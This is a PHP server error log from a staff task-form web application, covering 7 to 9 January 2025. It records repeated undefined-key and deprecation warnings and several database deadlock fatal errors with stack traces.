PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 05:05:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 05:09:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 05:44:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 05:45:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [07-Jan-2025 06:09:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 06:17:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 06:40:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 06:40:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 06:44:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 06:48:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 07:12:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 08:40:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 09:51:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 09:52:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 09:52:52 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 11:09:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 20:00:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 20:44:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 20:45:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 20:45:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 20:45:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 20:45:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 23:01:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 23:08:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 23:12:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 23:12:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 23:13:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 23:14:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 23:19:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 00:41:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 00:56:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 00:58:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 01:12:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 01:28:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 01:29:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 01:30:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 01:30:33 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 01:30:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 01:31:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 01:44:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 02:02:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:02:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:02:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:04:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [08-Jan-2025 02:05:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:06:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:06:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:16:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:25:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:26:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:26:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:26:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:27:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:27:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:27:42 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:30:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:32:20 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [08-Jan-2025 02:32:20 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [08-Jan-2025 02:32:20 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [08-Jan-2025 02:32:20 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [08-Jan-2025 02:32:20 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [08-Jan-2025 02:55:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 03:02:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 03:30:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 03:31:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 04:03:18 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [08-Jan-2025 04:03:18 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [08-Jan-2025 04:03:18 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [08-Jan-2025 04:03:18 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [08-Jan-2025 04:03:18 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [08-Jan-2025 04:03:18 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [08-Jan-2025 04:31:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 04:35:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 05:30:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 05:32:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 05:43:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 05:44:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 05:50:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 05:50:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 06:14:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [08-Jan-2025 06:29:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 06:45:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 06:46:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 07:14:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 07:55:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 08:31:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 08:33:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 15:20:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 15:21:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 15:21:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 15:21:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 15:22:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 21:02:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 21:06:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 21:06:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 21:07:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 23:32:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 23:49:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 23:49:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 23:51:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 00:21:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 00:21:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 00:34:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 00:56:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 01:33:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 02:19:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 02:58:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 02:59:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 03:10:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 03:12:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 03:12:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 03:13:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 03:13:51 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 03:18:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 04:16:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 04:46:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 05:14:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 05:25:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 05:34:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 05:35:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 05:50:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 05:57:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 06:27:18 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/emeraadmin/public_html/Classes/Database.php:78 Stack trace: #0 /home/emeraadmin/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/emeraadmin/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/emeraadmin/public_html/pages/submit_form.php(40): TaskFormService->insertTaskForm(Object(TaskForm)) #3 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 78 [09-Jan-2025 06:27:35 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/emeraadmin/public_html/Classes/Database.php:78 Stack trace: #0 /home/emeraadmin/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/emeraadmin/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/emeraadmin/public_html/pages/submit_form.php(40): TaskFormService->insertTaskForm(Object(TaskForm)) #3 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 78 [09-Jan-2025 06:27:35 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/emeraadmin/public_html/Classes/Database.php:78 Stack trace: #0 /home/emeraadmin/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/emeraadmin/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/emeraadmin/public_html/pages/submit_form.php(40): TaskFormService->insertTaskForm(Object(TaskForm)) #3 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 78 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [09-Jan-2025 06:28:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 06:30:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 06:35:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 06:36:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 06:42:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 06:48:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 06:54:04 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/completedsubtaskform.php on line 212 [09-Jan-2025 06:54:04 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/completedsubtaskform.php on line 216 [09-Jan-2025 06:54:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/completedsubtaskform.php on line 212 [09-Jan-2025 06:54:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/completedsubtaskform.php on line 216 [09-Jan-2025 07:02:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 07:02:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 09:06:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 09:08:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 09:08:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 09:09:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 09:09:17 UTC] PHP 